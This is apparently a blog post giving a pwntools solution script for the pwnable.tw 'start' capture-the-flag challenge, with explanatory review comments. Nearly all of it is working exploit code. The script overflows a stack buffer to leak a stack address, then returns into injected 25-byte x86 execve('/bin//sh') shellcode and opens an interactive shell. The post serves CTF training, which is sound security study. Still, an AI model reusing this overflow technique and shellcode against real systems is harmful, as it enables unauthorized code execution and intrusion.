
[pwnable.tw] start 100pt

J1W0N 2018. 8. 8. 23:00
# pwnable.tw "start" solution script.
# Written for Python 2 / legacy pwntools: `print` is a statement and the
# payloads are `str` objects (on Python 3 pwntools they would need to be bytes).
from pwn import *

# Target is the local binary; the remote line is the commented-out alternative.
s = process("./start")
#s = remote("chall.pwnable.tw",10000)

# Raw x86-32 machine code appended to the second payload. The bytes embed the
# ASCII string "/bin//sh" and end in "\xcd\x80" (int 0x80), i.e. an execve-style
# shell spawn; it is 25 bytes long.
shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


# Loaded but never referenced below (no symbol lookups are made) — could be dropped.
elf = ELF("./start")

# Hard-coded address inside ./start used as the first payload's 4-byte return
# target. NOTE(review): presumably the code that writes 0x14 bytes from the
# stack back to the client, since 4 bytes are read and treated as a stack
# address right after — confirm against the binary's disassembly.
doldol = 0x08048087


# Consume the banner up to the prompt before sending anything.
print s.recvuntil("Let's start the CTF:")


# First payload: 20 bytes of filler, then the little-endian address (p32).
pay = "A" * 20
pay += p32(doldol)

s.send(pay)

# Interpret the first 4 bytes returned as a little-endian 32-bit stack address.
stack = u32(s.recv(4))
print "stack address : %s" %str(hex(stack))


# Second payload: same 20-byte filler, then a pointer to stack+0x14 (20), then
# the code that pointer is expected to land on. The 8 bytes "\x31\xC0\x31\xDB
# \x31\xC9\x31\xD2" encode xor eax,eax / xor ebx,ebx / xor ecx,ecx / xor edx,edx,
# zeroing the registers before `shell` runs.
# NOTE(review): the 0x14 offset assumes the leaked value points 20 bytes below
# where the appended code lands — verify against the leak if the layout changes.
pay = "B" * 20
pay += p32(stack+0x14)
pay += "\x31\xC0\x31\xDB\x31\xC9\x31\xD2"
pay += shell

s.send(pay)


# Print whatever the process emits next, then hand the session to the user.
print s.recv(1024)
s.interactive()

:))